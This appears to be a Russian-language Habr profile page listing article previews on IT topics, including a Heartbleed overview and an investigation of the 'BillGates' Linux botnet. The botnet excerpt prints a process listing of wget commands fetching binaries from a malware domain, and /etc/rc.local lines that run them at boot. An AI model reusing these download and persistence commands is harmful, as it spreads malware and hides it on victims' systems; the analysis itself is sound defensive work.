Pull to refresh
44
0
Глазунов Иван @leon_3

CEO Deep.Foundation

Send message

Использование снов для тестирования проекта

Reading time2 min
Views12K
У меня по ночам работают тест кейсы. На входе в сон, задаешь параметры и получаешь видеоряд возможных событий вместе с реакцией системы на эти события. Утром проверяешь адекватность увиденного и вносишь поправки в макет.

В отличие от стандартных методов тестирования, сны позволяют проиграть нелепые и невообразимые ситуации. Это же сон! И легко может приснится юзер, который пытается зарегистрироваться на вашем сайте в то время, как за ним гонятся зомби!

Удобен ли ваш сайт для регистрации в условиях зомби-апокалипсиса?

Что-что, простите?..
Total votes 31: ↑17 and ↓14+3
Comments10

Почему в России почти нет гражданского/коммерческого высокотехнологичного производства?

Reading time27 min
Views409K
Статью с обзором ситуации с микроэлектроникой в России я закончил утверждением, что сейчас в России есть технические возможности для создания любых военных микросхем (если не считаться с ценой). Однако и в комментариях к той статье, и во многих других — всех больше волновал вопрос отсутствия (на уровне погрешности измерений) производства чисто-коммерческих (гражданских) высокотехнологичных продуктов. Этот вопрос волновал и меня, потому я постоянно мучил вопросами всех, кто так или иначе связан с высокими технологиями и бизнесом в России.

Ответ на него важен, если вы сами хотите создать конкурентный высокотехнологичный продукт — чтобы не потратить лучшие годы жизни в изначально неравных условиях.

Под катом попробуем разобраться чем отличаются «высокотехнологичные» компании от «низкотехнологичных», что нужно, чтобы высокотехнологичные компании могли рождаться и выживать, почему с софтом у нас лучше, чем с хардом, с чего начиналась кремниевая долина в США и можно ли её «скопировать», почему Китай всех рвет, а также — окинем взором все, что происходит в Сколково, Роснано, фонде перспективных исследований и приведут ли они к расцвету российских инноваций. Безусловно, я где-то могу ошибаться — буду рад дополнениям в комментариях.

Сразу нужно отметить, что в связи с многогранностью проблемы объем статьи получился довольно большой, так что можно начать читать с резюме в конце, и затем прочитать лишь те разделы, которые вызовут интерес. Сразу хочу предупредить — повествование «нелинейное», соседние заголовки могут описывать разные аспекты проблемы и быть друг с другом практически не связанными.
Читать дальше →
Total votes 389: ↑380 and ↓9+371
Comments304

Пора перестать сохранять

Reading time4 min
Views44K

Немного лирики


Как-то раз, примерно полгода назад, при переезде с одной квартиры на другую в одной из бесконечных коробок обнаружился архив аудиокассет — штук 30. Этот набор долёживал там свой век, хотя последний магнитофон, способный проигрывать кассеты, сломался года за три до этого.
Моя 9-летняя дочь, наткнувшись на эту коробку, взяла одну из этих кассет в руки, повертела и спросила: «Папа, а что это?».
Конечно, если задуматься, в этом нет ничего удивительного. Новое поколение, рожденное после 2000, уже не видело ни кассет, ни дискет.



И что-то мне подсказывает, что поколение, родившееся после 2020, не увидит уже и компакт дисков — все планомерно уходит на всевозможные флешки и карты памяти, а в перспективе и обмен, и хранение (благодаря «облакам»), и ритейл софта/фильмов/музыки (благодаря Стиву Джобсу) уйдут в «онлайн». Я и сам больше уже не записываю полюбившиеся фильмы на болванки.
И что с того?
Total votes 82: ↑63 and ↓19+44
Comments56

Преднастройка продуктов Mozilla для корпоративной среды это просто

Reading time4 min
Views19K

Обычно после установки продуктов Mozilla в корпоративной среде требуется дополнительно установить:
  • стандартный для компании набор плагинов
  • сделать типовые настройки


Почему бы не интегрировать необходимые плагины и типовые настройки в дистрибутив?
Цель данной статьи — показать как можно перепаковать дистрибутив Mozilla, добавив необходимые компоненты.

Сразу оговорюсь: рассматривать установку любого дистрибутива в корпоративной среде не стану — про это написано множество статей и имеется множество готовых либо самодельных инструментов.
Вторая оговорка: распространяя модифицированный дистрибутив Mozilla за пределы своей организации без подписания дополнительного соглашения с Mozilla Вы нарушите лицензионное соглашение.

Но наша цель — подготовить внутренний дистрибутив для своей организации, так что всё в порядке.

Простая инструкция
Total votes 21: ↑19 and ↓2+17
Comments25

Справочник по уязвимости OpenSSL Heartbleed

Reading time4 min
Views60K

Что может узнать атакующий


Приватный ключ TLS сервера, приватный ключ TLS клиента (если клиент уязвим), cookies, логины, пароли и любые другие данные, которыми обменивается сервер и его клиенты. При этом не нужно прослушивать канал связи, достаточно послать специально сформированный пакет, и это нельзя обнаружить в логах сервера.

Уязвимость двусторонняя: если уязвимый клиент подключается к серверу злоумышленника, то злоумышленник может читать память процесса клиента. Пример уязвимых клиентов: MariaDB, wget, curl, git, nginx (в режиме прокси).
Читать дальше →
Total votes 68: ↑64 and ↓4+60
Comments46

Как меня назвали параноиком и что из этого вышло

Reading time5 min
Views30K
Когда начались утечки баз паролей/хэшей с разных форумов и соц. сетей я начал задумываться о том как и где хранить свои пароли, что бы их можно было быстро менять и при этом не забыть. Так я наткнулся на программу KeePass Password Safe, о её возможностях я расписывать не буду так как на Хабре статей предостаточно и тематика данной статьи не о его возможностях. По мере эксплуатации KeePass обрастал плагинами, особенно для связки с браузерами, LastPass был отброшен так как не хотелось где-то «у дяди» хранить пароли (особенно к рабочим системам), да и не факт, что их от туда тоже не сольют.

Сначала для Firefox было расширение KeeFox, но так как через KeePassRPC (плагин KeePass) работает только оно — то сейчас это расширение давно отключено и не используется. Затем было найдено расширение PassIFox (работает через плагин KeePass — KeePassHttp) с ним же сразу и ChromeIPass — а вот для Opera 11, Opera 12 (здесь и в дальнейшем подразумевается на движке Presto и это мой основной браузер) хорошей интеграции не было, был только UserJS-скрипт добавляющий в заголовок окна адрес страницы, было даже создано расширение делающее тоже самое — для того чтобы KeePass мог определить адрес для которого нужно искать логин и пароль для подстановки по Ctrl+Alt+A (стандартный хот-кей авто-заполнения KeePass). Так как современных навыков по JavaScript у меня нет, я попытал счастья на OperaFan с просьбой написать/переделать расширение для Opera — где меня и назвали параноиком. Продолжение истории о портировании ChromeIPass в Opera 12 (без сильно технических деталей) под катом.
Читать дальше →
Total votes 26: ↑16 and ↓10+6
Comments11

Как я использовал BitTorrent Sync между офисами в РФ и Китае

Reading time6 min
Views55K
Давно не видел статей о BitTorrentSync, и очень удивляюсь: ведь это такой полезный инструмент. Буквально на днях вышла новая версия*, и я решил рассказать, как применил это решение на работе.



Начало

Однажды в нашей компании наступил момент, когда встала необходимость обмениваться довольно тяжёлыми файлами — макетами продукции и упаковки (100-500 мегабайт) между офисами в Москве, Екатеринбурге и офисом в провинции Чжэцзян, КНР. Сложность была в катастрофически низкой скорости и надёжности связи РФ — Китай.

Когда я обратил внимание на проблему, царил полный разброд и шатание:
Читать дальше →
Total votes 80: ↑75 and ↓5+70
Comments80

Скрытый шифрованный диск с защитой от терморектальной расшифровки

Reading time3 min
Views54K
В последнее время в блоге "Информационная безопасность" проскакивало несколько топиков про способы шифрования данных для защиты от маски-шоу. Но все эти способы, исходя из бурных обсуждений в комментариях, не проходят проверку паяльником.

Поэтому я хочу предложить свой способ защиты данных от особо интересующихся лиц в масках — шифрование данных на скрытом диске, который имеет дополнительный уровень в защите от паяльника.
Читать дальше →
Total votes 42: ↑23 and ↓19+4
Comments42

Домашний сервер «всё-в-одном» — success story

Reading time9 min
Views139K
Жил да был у меня роутер одной хорошей фирмы на букву «Dead». Ну, это с ним, собственно, и случилось.
Посмотрел я на цены новых, на кучу компьютерного хлама в углу, на список подключений на домашнем компе… И понял, что не нужен мне роутер. Соберу свой, с нормальной маршрутизацией, DNS, WINS, i2p, блекджеком и так далее.
Как это было?
Total votes 134: ↑110 and ↓24+86
Comments87

Samba4 + GlusterFS

Reading time3 min
Views16K
    Многие уже сталкивались с такой штукой как GlusterFS, кто-то же пока еще не в курсе дел, сегодня всех вас приглашаю познакомиться с этим проектом, а точнее с возможностью использования GlusterFS вкупе с Samba4 для построения распределённого, линейно масштабируемого файлового хранилища с защитой от сбоев.

    В этом материале будет рассмотрено несколько возможностей использования GlusterFS с Samba4, а так же анализ производительности каждого варианта.
Читать дальше →
Total votes 15: ↑13 and ↓2+11
Comments7

Нейропластичность — 8 изменений в человеке, сформировавшихся под воздействием технологий

Reading time5 min
Views86K
Технологии изменили человеческую физиологию, пишет 8banks. Они заставили нас думать по-другому, чувствовать по-другому, даже видеть сны по-другому. Они влияют на нашу память, внимание и циклы сна. Это связано с научным явлением, известным как нейропластичность — способности мозга изменять привычное поведение на основе нового опыта. В этом случае это интерактивные технологии и огромный объем информации поступающий из интернета.


Читать дальше →
Total votes 108: ↑89 and ↓19+70
Comments96

Samba4 в роли AD + файловый сервер

Reading time5 min
Views157K
    В этой статье я рассмотрю по шагам подготовку к использованию Samba4 в роли контроллера домена вкупе с дополнительным файловым сервером так же на базе Samba4. Что в итоге мы получим? Два настроенных сервера с samba4, первый в роли domain controller, второй в роли member server с файлами пользователей. Функционирования этой связки я добивался около месяца, за сим, не поделится конечным рецептом просто не имею права…



    Немного предыстории: в компании используется файловый сервер на базе samba3.6 с LDAP Backend, который содержит список всех пользователей и групп с правами доступа. Права доступа на каталоги выставляются с помощью xattr_acl (Extended file attributes), в LDAP хранится список пользователей с соответствием группам доступа. Собственно требуется переехать с этой инфраструктуры на samba4…
Читать дальше →
Total votes 35: ↑35 and ↓0+35
Comments24

Контроллер умного дома (с Ethernet, WiFi, USB, блэкджеком и плюшками) за $20?

Reading time7 min
Views217K
Некоторое время назад к нам обратился один потенциальный заказчик со своей идеей проекта «умного дома». Мы заказчикам всегда рады, особенно если у них есть более-менее внятная идея и достаточно денег для ее воплощения (сразу скажу — этот заказчик пока что является идеалом сферического заказчика в вакууме, повезло нам с ним). Так что после пары встреч родилось общее описание проекта, и мы приступили к поиску вариантов технической реализации. Нужен был недорогой контроллер с поддержкой WiFi и USB, небольшим энергопотреблением и, главное, с достаточно открытой архитектурой, чтобы мы могли сделать на его базе собственное кастомизированное решение.

И тут очень удачно попалась нам на глаза статья. Ух ты, какие штуки бывают, оказывается! У меня самого в качестве передвижной точки доступа для поездок по Китаю (где до сих пор RJ-45 розетка в номере при отсутствии WiFi — довольно частое явление) давно уже используется мини-роутер TP-LINK TL-WR702N, купленный рублей за 700, но тот факт, что внутри живет вполне приличный одноплатный компьютер с кучей дополнительных возможностей, стал для меня приятным сюрпризом. А поскольку мы по своему основному бизнесу плотно завязаны с Китаем (и китайскими производителями электроники в частности), стало нам интересно — во сколько же нам обойдется собственная плата на базе SoC AR9331, если целое законченное решение в корпусе, в коробке, с проводами и блоком питания, стоит в России 700р (на то время — $22) в рознице?

image
И мы приступили к исследованиям...
Total votes 53: ↑53 and ↓0+53
Comments146

Мониторинг событий информационной безопасности с помощью ZABBIX

Reading time9 min
Views171K
image

Некоторое время поработав с Zabbix, я подумал, почему бы не попробовать использовать его в качестве решения для мониторинга событий информационной безопасности. Как известно, в ИТ инфраструктуре предприятия множество самых разных систем, генерирующих такой поток событий информационной безопасности, что просмотреть их все просто невозможно. Сейчас в нашей корпоративной системе мониторинга сотни сервисов, которые мы наблюдаем с большой степенью детализации. В данной статье, я рассматриваю особенности использования Zabbix в качестве решения по мониторингу событий ИБ.
Читать дальше →
Total votes 47: ↑40 and ↓7+33
Comments29

Как подружить MS Office и LibreOffice

Reading time5 min
Views230K
image
Здравствуй, читатель! Ты когда-нибудь занимался переводом своего офиса/школы/института/друзей на Linux? Помнишь, как долго и упорно ты доказывал, что это — путь добра и света? А помнишь первую проблему, из-за которой пришлось все вернуть назад? Дай угадаю. Первый документ созданный в LibreOffice или OpenOffice отказался корректно открываться в MS Office? Слезы, сопли и мольбы оставить Linux ни к чему не привели? Утри нос, читатель! Под катом — о том, как подружить LibreOffice 3.5 и MS Office 2010 так, чтобы все везде открывалось одинаково.

Читать дальше →
Total votes 106: ↑82 and ↓24+58
Comments152

Windows-приложения в веб-браузерах пользователей. Свое облако с блэк-джеком и т.д

Reading time4 min
Views30K

Идея запускать приложения не на компьютере пользователя, а на удаленном сервере, и транслировать изображение пользователю по сети – не нова, и давно «витает в воздухе». Согласитесь, идея хорошая: ведь для установки любого нового ПО на свой компьютер необходимо разобраться с политикой лицензирования (кому это актуально), найти дистрибутив (желательно, без вредоносного ПО внутри), установить и настроить ПО — иногда просто руки опускаются. Кроме того, подход с трансляцией ПО снимает необходимость в своем производительном «железе», что становится актуальным в свете ежегодного роста продаж планшетных компьютеров и смартфонов. Да и интернет есть повсюду в мегаполисах: слушать музыку и смотреть кино онлайн, в конце концов, все уже давно привыкли.

Вот только ни одного полнофункциональной разработки, подходящего для применения в сети Интернет до сих пор так и не видно. Мы подумали, что это никуда не годится и решили сделать ее.
Читать дальше →
Total votes 21: ↑17 and ↓4+13
Comments40

Исследуем Linux Botnet «BillGates»

Reading time26 min
Views87K
image

Написал мне вчера lfatal1ty, говорит, домашний роутер на x86 с CentOS как-то странно себя ведет, грузит канал под гигабит, и какой-то странный процесс «atddd» загружает процессор. Решил я залезть и посмотреть, что же там творится, и сразу понял, что кто-то пробрался на сервер и совершает с ним непотребства всякие. В процессах висели wget-ы на домен dgnfd564sdf.com и процессы atddd, cupsdd, cupsddh, ksapdd, kysapdd, skysapdd и xfsdxd, запущенные из /etc:
Скрытый текст
root      4741  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/sksapd
root      4753  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx
root      4756  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd
root      4757  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/kysapd
root      4760  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/ksapd
root      4764  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/atdd
root      4767  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http://www.dgnfd564sdf.com:8080/skysapd

К сожалению, процессы не додумался скопировать

Начальный анализ


Сначала я полез смотреть, что же вообще происходит и насколько серьезно была скомпрометирована система. Первое, что мне пришло в голову проверить — /etc/rc.local. Там было следующее:
cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd

«Хмм, ладно», подумал я. Полез в root'овский crontab
Читать дальше →
Total votes 150: ↑145 and ↓5+140
Comments72

FortiAP-14С – remote access point от Fortinet. Хороший вариант построения безопасной беспроводной сети для удалённого офиса

Reading time13 min
Views11K
В данной статье мы поговорим о FortiAP-14С, новинке в линейке беспроводных точек доступа FortiAP от Fortinet – миниатюрной одномодульной точке для построения для удалённых офисов/филиалов предприятий, которая по праву позиционирована и названа Remote AP. Это одна из трёх точек доступа, позиционирующихся вендором как «удалённая» — в линейке есть ещё FortiAP-11С послабее (зато удобнее для личных целей, а-ля путешествий и частых перемещений вне офиса) и FortiAP-28С (помощнее).

Описывая функциональность UTM-устройств FortiGate в одной из предыдущих статей, мы обозначили, что FortiGate среди множества своих возможностей имеет «на борту» встроенный беспроводный контроллер (у моделей 40С и выше) для управления «тонкими» точками доступа FortiAP.



Поэтому в качестве «Дано» для сегодняшнего обзора нашей новинки подразумеваем центральный офис с защищённой с помощью FortiGate корпоративной сетью и офис удалённый, где мы будем разворачивать отдельный островок безопасной инфраструктуры.
Читать дальше →
Total votes 5: ↑4 and ↓1+3
Comments0

Реакция разных компаний на уязвимости их ресурсов

Reading time5 min
Views55K
В данном посте я решил немного рассказать о своих исследованиях в области IT безопасности.
Некоторые компании не будут названы в статье, чтобы не портить «имидж».

Ресурсы в которых были найдены уязвимости: aa.mail.ru, nag.ru, graph.document.kremlin.ru, sencha.com, parallels.com, volgogsm.ru, next-one.ru, а также туроператор X, и одна из дочерних организаций Газпрома.

Достаточно давно уже увлекаюсь проведением исследований безопасности разных ресурсов. Большинство из них мне приходилось использовать самому и было интересно узнать в сохранности ли мои данные.
Читать дальше →
Total votes 151: ↑144 and ↓7+137
Comments93

Управленческие инструменты: Как невольно затроллить собеседника и получить минус в карму

Reading time2 min
Views49K
В предыдущей статье по управленческим инструментам мы разбирали алгоритм, как конструктивно решать проблемы с людьми. Настала очередь поговорить о неконструктивных приемах. И начну с истории.

В 2004 году наш коллектив, мирно делающий проекты для Sun Microsystems, решила приобрести корпорация, мировой лидер по производству микропроцессоров. Прилетел вице-президент корпорации и начал раздавать оферы.

На тот момент я руководил командой тестирования Java на мобильных устройствах. Соответственно мне был выдан офер на позицию менеджера с приятными цифрами. В душе немедленно наступила весна, я вырос на пол-метра и начал думать, что именно мы с супругой приобретем. (Пишу, не чтобы мне начали завидовать — задаю контекст ситуации).

И вот иду я по коридору со счастливой улыбкой на лице. Навстречу — директор одного из Sun'овских подразделений, назовем его Сергей. У нас были такие приятельские отношения, поэтому ничто не предвещало беды.

Что было дальше?
Total votes 67: ↑43 and ↓24+19
Comments60

Information

Rating
Does not participate
Location
Москва, Москва и Московская обл., Россия
Date of birth
Registered
Activity